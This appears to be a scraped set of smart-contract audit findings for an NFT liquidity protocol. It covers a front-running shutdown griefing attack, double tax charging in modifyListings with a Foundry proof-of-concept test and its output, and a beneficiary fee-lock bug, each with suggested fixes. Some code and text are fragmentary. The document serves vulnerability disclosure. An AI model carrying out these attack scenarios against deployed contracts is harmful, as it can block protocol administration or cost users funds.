// Notify that we are processing a shutdown
emit CollectionShutdownStarted(_collection);
// Cast our vote from the user
156: _collectionParams[_collection] = _vote(_collection, params);
As can be seen, the above function doesn't check if collection is already initialized and the condition of L147
will be true because collection is not initialized yet.
In addition, _vote()
function of L156
requires msg.sender
should hold non-zero collectionToken
From above reasoning, the following scenario is available.
- Admin create collection by calling
function. - Before admin initialize the collection by calling
function, using frontrun, attacker deposit 1 NFT and receive correspondingcollectionToken
s. - Attacker(
) transfer1 wei
to some otherattackerAddress2
. - Attacker(
) start shutdown by callingCollectionShutdown.start()
function. It will succeed because number of deposited NFT is only one which is less thanMAX_SHUTDOWN_TOKENS = 4
. - After that, admin can't prevent shutdown for the collection by calling
function because there is already a shutdown in progress.
Comment of CollectionShutdown.start()
function has following paragraph:
* When the trigger is set, it will only be available for a set duration.
* If this duration passes, then the process will need to start again.
But in fact, there is no such restriction in the current implementation.
Therefore, once if a shutdown is in progress, it will be available for unlimited time and the preventShutdown()
function will be DOSed for unlimited time too.
Manual Review
Disable the CollectionShutdown.start()
function before collection is initialized.
function doesn't update listing.created
when user doesn't change duration (i.e. params.duration == 0
). Therefore, user will pay tax again for the period from listing.created
to block.timestamp
function is following.
function modifyListings(address _collection, ModifyListing[] calldata _modifyListings, bool _payTaxWithEscrow) public nonReentrant lockerNotPaused returns (uint taxRequired_, uint refund_) {
uint fees;
for (uint i; i < _modifyListings.length; ++i) {
// Store the listing
ModifyListing memory params = _modifyListings[i];
Listing storage listing = _listings[_collection][params.tokenId];
--- SKIP ---
// Collect tax on the existing listing
323: (uint _fees, uint _refund) = _resolveListingTax(listing, _collection, false);
emit ListingFeeCaptured(_collection, params.tokenId, _fees);
fees += _fees;
refund_ += _refund;
// Check if we are altering the duration of the listing
if (params.duration != 0) {
// Ensure that the requested duration falls within our listing range
if (params.duration < MIN_LIQUID_DURATION) revert ListingDurationBelowMin(params.duration, MIN_LIQUID_DURATION);
if (params.duration > MAX_LIQUID_DURATION) revert ListingDurationExceedsMax(params.duration, MAX_LIQUID_DURATION);
emit ListingExtended(_collection, params.tokenId, listing.duration, params.duration);
337: listing.created = uint40(block.timestamp);
listing.duration = params.duration;
--- SKIP ---
--- SKIP ---
The tax which user pays in L323
are calculated depends on block.timestamp - listings.created
and listing.floorMultiple
However, the above function pays tax up to block.timestamp
in L323
, but doesn't update listing.created
when params.duration == 0
Therefore, user should pay tax again for the period from listing.created
to block.timestamp
after that.
Add the following test code into Listings.t.sol
function test_PayTaxAgainWhenModifyListings() public {
// Flatten our token balance before processi for ease of calculation
ICollectionToken token = locker.collectionToken(address(erc721a));
deal(address(token), address(this), 0);
uint[] memory tokenIds = new uint[](1);
tokenIds[0] = 0;, 0);
erc721a.setApprovalForAll(address(listings), true);
// Set up multiple listings
IListings.CreateListing[] memory _listings = new IListings.CreateListing[](1);
_listings[0] = IListings.CreateListing({
collection: address(erc721a),
tokenIds: tokenIds,
listing: IListings.Listing({
owner: payable(address(this)),
created: uint40(block.timestamp),
floorMultiple: 200
// Create our listings
vm.warp(block.timestamp + VALID_LIQUID_DURATION);
token.approve(address(listings), type(uint).max);
// first modifyListings
uint balance1 = token.balanceOf(address(this));
IListings.ModifyListing[] memory params = new IListings.ModifyListing[](1);
params[0] = IListings.ModifyListing(0, 0/* no change for duration */, 300);
listings.modifyListings(address(erc721a), params, true);
uint balance2 = token.balanceOf(address(this));
int diff1 = int(balance2) - int(balance1);
console.log("balance diff 1:", diff1);
console.log("OK: Since floorMultiple increase, balance should be decreased.");
// second modifyListings
params[0].floorMultiple = 200;
listings.modifyListings(address(erc721a), params, true);
uint balance3 = token.balanceOf(address(this));
int diff2 = int(balance3) - int(balance2);
console.log("balance diff 2:", diff2);
console.log("ERROR: Although floorMultiple decrease and no time passed, balance is decreased.");
The result of test code is following.
balance diff 1: -85000000000000000
OK: Since floorMultiple increase, balance should be decreased.
balance diff 2: -17500000000000000
ERROR: Although floorMultiple decrease and no time passed, balance is decreased.
User will pay tax again for the period from listing.created
to block.timestamp
when modify listings.
That is, there is loss of user's fund.
Manual Review
Modify modifyListings()
function as follows.
function modifyListings(address _collection, ModifyListing[] calldata _modifyListings, bool _payTaxWithEscrow) public nonReentrant lockerNotPaused returns (uint taxRequired_, uint refund_) {
uint fees;
for (uint i; i < _modifyListings.length; ++i) {
// Store the listing
ModifyListing memory params = _modifyListings[i];
Listing storage listing = _listings[_collection][params.tokenId];
--- SKIP ---
// Collect tax on the existing listing
(uint _fees, uint _refund) = _resolveListingTax(listing, _collection, false);
emit ListingFeeCaptured(_collection, params.tokenId, _fees);
++ listing.created = uint40(block.timestamp);
fees += _fees;
refund_ += _refund;
// Check if we are altering the duration of the listing
if (params.duration != 0) {
// Ensure that the requested duration falls within our listing range
if (params.duration < MIN_LIQUID_DURATION) revert ListingDurationBelowMin(params.duration, MIN_LIQUID_DURATION);
if (params.duration > MAX_LIQUID_DURATION) revert ListingDurationExceedsMax(params.duration, MAX_LIQUID_DURATION);
emit ListingExtended(_collection, params.tokenId, listing.duration, params.duration);
-- listing.created = uint40(block.timestamp);
listing.duration = params.duration;
--- SKIP ---
--- SKIP ---
If BaseImplementation.setBeneficiary()
sets new beneficiary which is a Flayer pool, old beneficiary can not claim the unclaimed fees.
function is following.
* Allows our beneficiary address to be updated, changing the address that will
@> * be allocated fees moving forward. The old beneficiary will still have access
* to `claim` any fees that were generated whilst they were set.
* @param _beneficiary The new fee beneficiary
* @param _isPool If the beneficiary is a Flayer pool
function setBeneficiary(address _beneficiary, bool _isPool) public onlyOwner {
beneficiary = _beneficiary;
beneficiaryIsPool = _isPool;
// If we are setting the beneficiary to be a Flayer pool, then we want to
// run some additional logic to confirm that this is a valid pool by checking
// if we can match it to a corresponding {CollectionToken}.
if (_isPool && address(locker.collectionToken(_beneficiary)) == address(0)) {
revert BeneficiaryIsNotPool();
emit BeneficiaryUpdated(_beneficiary, _isPool);
As can be seen, the comment of the above function says that "The old beneficiary will still have access to claim
any fees that were generated whilst they were set.". However, if _isPool
parameter is true
, beneficiaryIsPool
state variable will be set as true
. Therefore, after that, the following BaseImplementation.claim()
function will revert in L171
for old beneficiary.
function claim(address _beneficiary) public nonReentrant {
// Ensure that the beneficiary has an amount available to claim. We don't revert
// at this point as it could open an external protocol to DoS.
uint amount = beneficiaryFees[_beneficiary];
if (amount == 0) return;
// We cannot make a direct claim if the beneficiary is a pool
171: if (beneficiaryIsPool) revert BeneficiaryPoolCannotClaim();
// Reduce the amount of fees allocated to the `beneficiary` for the token. This
// helps to prevent reentrancy attacks.
beneficiaryFees[_beneficiary] = 0;
// Claim ETH equivalent available to the beneficiary
IERC20(nativeToken).transfer(_beneficiary, amount);
emit BeneficiaryFeesClaimed(_beneficiary, amount);
The comment "The old beneficiary will still have access to claim
any fees that were generated whilst they were set." means that admin may not call claim()
function for old beneficiary before calling setBeneficiary()
function. By Sherlock rule, the code comments stands above all judging rules. Therefore, the old beneficiary may lose the unclaimed fees. Lock of Funds.
Manual Review
Insert the following condition check in BaseImplementation.setBeneficiary()
if (_isPool && beneficiaryFees[_beneficiary] > 0) {
Or, fix the comment as the following.
Admin should call `claim()` function for old beneficiary before calling `setBeneficiary()` function when `_isPool` is true.